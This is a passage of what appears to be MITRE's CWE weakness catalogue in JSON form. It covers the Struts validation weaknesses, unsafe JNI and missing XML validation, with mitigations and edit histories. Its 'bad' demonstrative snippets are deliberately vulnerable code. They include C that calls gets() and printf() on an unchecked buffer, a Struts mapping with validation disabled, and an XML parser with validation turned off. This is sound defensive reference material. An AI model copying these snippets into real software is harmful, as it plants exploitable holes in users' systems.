variables"],"xhtml:div":{"#text":"super();","attr":{"@_style":"margin-left:10px;"}}}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<form-validation></form-validation>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<formset></formset>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<form name=\\"RegistrationForm\\"></form>","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"<field property=\\"name\\" depends=\\"required\\"></field><field property=\\"address\\" depends=\\"required\\"></field><field property=\\"city\\" depends=\\"required\\"></field><field property=\\"state\\" depends=\\"required,mask\\"></field><field property=\\"zipcode\\" depends=\\"required,mask\\"></field><field property=\\"phone\\" depends=\\"required,mask\\"></field><field property=\\"email\\" depends=\\"required,email\\"></field>","xhtml:div":[{"#text":"<arg position=\\"0\\" key=\\"prompt.name\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.address\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.city\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg position=\\"0\\" key=\\"prompt.state\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>[a-zA-Z]{2}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.zipcode\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>\\\\d{5}</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.phone\\"/><var></var>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"<var-name>mask</var-name><var-value>^([0-9]{3})(-)([0-9]{4}|[0-9]{4})$</var-value>","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}},{"#text":"<arg position=\\"0\\" key=\\"prompt.email\\"/>","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["","","","","",""]}}}}}}}}],"Body_Text":["However, the validator XML file, validator.xml, for the RegistrationForm class includes the validation form for the user input form field \\"phone\\" that is no longer used by the input form and the RegistrationForm class. Any validation forms that are no longer required should be removed from the validator XML file, validator.xml.","The existence of unused forms may be an indication to attackers that this code is out of date or poorly maintained."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unused Validation Form"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"108":{"attr":{"@_ID":"108","@_Name":"Struts: Unvalidated Action Form","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Every Action Form must have a corresponding validation form.","Extended_Description":"If a Struts Action Form Mapping specifies a form, it must have a validation form defined under the Struts Validator.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Other","Note":"If an action form mapping does not have a validation form defined, it may be vulnerable to a number of attacks that rely on unchecked input. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."},{"Scope":["Confidentiality","Integrity","Availability","Other"],"Impact":"Other","Note":"Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Map every Action Form to a corresponding validation form.","An action or a form may perform validation in other ways, but the Struts Validator provides an excellent way to verify that all input receives at least a basic level of validation. Without this approach, it is difficult, and often impossible, to establish with a high level of confidence that all input is validated."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Unvalidated Action Form"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Common_Consequences, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"109":{"attr":{"@_ID":"109","@_Name":"Struts: Validator Turned Off","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that an action form mapping enables validation. Set the validate field to true."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This mapping defines an action for a download form:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<action path=\\"/download\\"type=\\"com.website.d2.action.DownloadAction\\"name=\\"downloadForm\\"scope=\\"request\\"input=\\".download\\"validate=\\"false\\"></action>","xhtml:br":["","","","","",""]}},"Body_Text":"This mapping has disabled validation. Disabling validation exposes this action to numerous types of attacks."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Turned Off"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"The Action Form mapping in the demonstrative example disables the form\'s validate() method. The Struts bean: write tag automatically encodes special HTML characters, replacing a < with \\"&lt;\\" and a > with \\"&gt;\\". This action can be disabled by specifying filter=\\"false\\" as an attribute of the tag to disable specified JSP pages. However, being disabled makes these pages susceptible to cross-site scripting attacks. An attacker may be able to insert malicious scripts as user input to write to these JSP pages.","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"110":{"attr":{"@_ID":"110","@_Name":"Struts: Validator Without Form Field","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.","Extended_Description":{"xhtml:p":["It is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the action form and the validation form.","Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"710","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"It is critically important that validation logic be maintained and kept in sync with the rest of the application. Unchecked input is the root cause of some of today\'s worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation."}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"},{"Method":"Manual Static Analysis","Description":"To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows an inconsistency between an action form and a validation form. with a third field.","Body_Text":["This first block of code shows an action form that has two fields, startDate and endDate.","This second block of related code shows a validation form with a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class DateRangeForm extends ValidatorForm {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String startDate, endDate;public void setStartDate(String startDate) {}public void setEndDate(String endDate) {}","xhtml:br":["","","",""],"xhtml:div":[{"#text":"this.startDate = startDate;","attr":{"@_style":"margin-left:10px;"}},{"#text":"this.endDate = endDate;","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":{"#text":"<form name=\\"DateRangeForm\\"></form>","xhtml:div":{"#text":"<field property=\\"startDate\\" depends=\\"date\\"></field><field property=\\"endDate\\" depends=\\"date\\"></field><field property=\\"scale\\" depends=\\"integer\\"></field>","attr":{"@_style":"margin-left:10px;"},"xhtml:div":[{"#text":"<arg0 key=\\"start.date\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg0 key=\\"end.date\\"/>","attr":{"@_style":"margin-left:10px;"}},{"#text":"<arg0 key=\\"range.scale\\"/>","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":["",""]}}}]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Struts: Validator Without Form Field"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Common_Consequences, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}]}},"111":{"attr":{"@_ID":"111","@_Name":"Direct Use of Unsafe JNI","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.","Extended_Description":"Many safety features that programmers may take for granted do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"695","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Implement error handling around the JNI call."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Do not use JNI calls if you don\'t trust the native library."},{"Phase":"Implementation","Strategy":"Refactoring","Description":"Be reluctant to use JNI calls. A Java API equivalent may exist."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"class Echo {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public native void runEcho();static {}public static void main(String[] args) {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"System.loadLibrary(\\"echo\\");","xhtml:br":""}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"new Echo().runEcho();","xhtml:br":""}}]}}}},{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <jni.h>#include \\"Echo.h\\"//the java class above compiled with javah#include <stdio.h>JNIEXPORT void JNICALLJava_Echo_runEcho(JNIEnv *env, jobject obj){}","xhtml:br":["","","","","",""],"xhtml:div":{"#text":"char buf[64];gets(buf);printf(buf);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}],"Body_Text":["Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input.","The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them.","The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference]."]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unsafe JNI"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC08-J","Entry_Name":"Define wrappers around native methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI01-J","Entry_Name":"Safely invoke standard APIs that perform tasks using the immediate caller\'s class loader instance (loadLibrary)"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"JNI00-J","Entry_Name":"Define wrappers around native methods","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-41"}},{"attr":{"@_External_Reference_ID":"REF-42"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description"}],"Previous_Entry_Name":{"#text":"Unsafe JNI","attr":{"@_Date":"2008-04-11"}}}},"112":{"attr":{"@_ID":"112","@_Name":"Missing XML Validation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software accepts XML from an untrusted source but does not validate the XML against the proper schema.","Extended_Description":"Most successful attacks begin with a violation of the programmer\'s assumptions. By accepting an XML document without validating it against a DTD or XML schema, the programmer leaves a door open for attackers to provide unexpected, unreasonable, or malicious input.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1286","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Input Validation","Description":{"xhtml:p":["Always validate XML input against a known XML Schema or DTD.","It is not possible for an XML parser to validate all aspects of a document\'s content because a parser cannot understand the complete semantics of the data. However, a parser can do a complete and thorough job of checking the document\'s structure and therefore guarantee to the code that processes the document that the content is well-formed."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code loads and parses an XML file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {} catch(Exception ex) {}","xhtml:br":["",""],"xhtml:i":"// Read DOM","xhtml:div":[{"#text":"...DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();factory.setValidating( false );....c_dom = factory.newDocumentBuilder().parse( xmlFile );","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}},"Body_Text":"The XML file is loaded without validating it against a known XML Schema or DTD."},{"Intro_Text":"The following code creates a DocumentBuilder object to be used in building an XML document.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"DocumentBuilderFactory builderFactory = DocumentBuilderFactory.newInstance();builderFactory.setNamespaceAware(true);DocumentBuilder builder = builderFactory.newDocumentBuilder();","xhtml:br":["",""]}},"Body_Text":"The DocumentBuilder object does not validate an XML document against a schema, making it possible to create an invalid XML document."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Missing XML Validation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"230"}},{"attr":{"@_CAPEC_ID":"231"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated 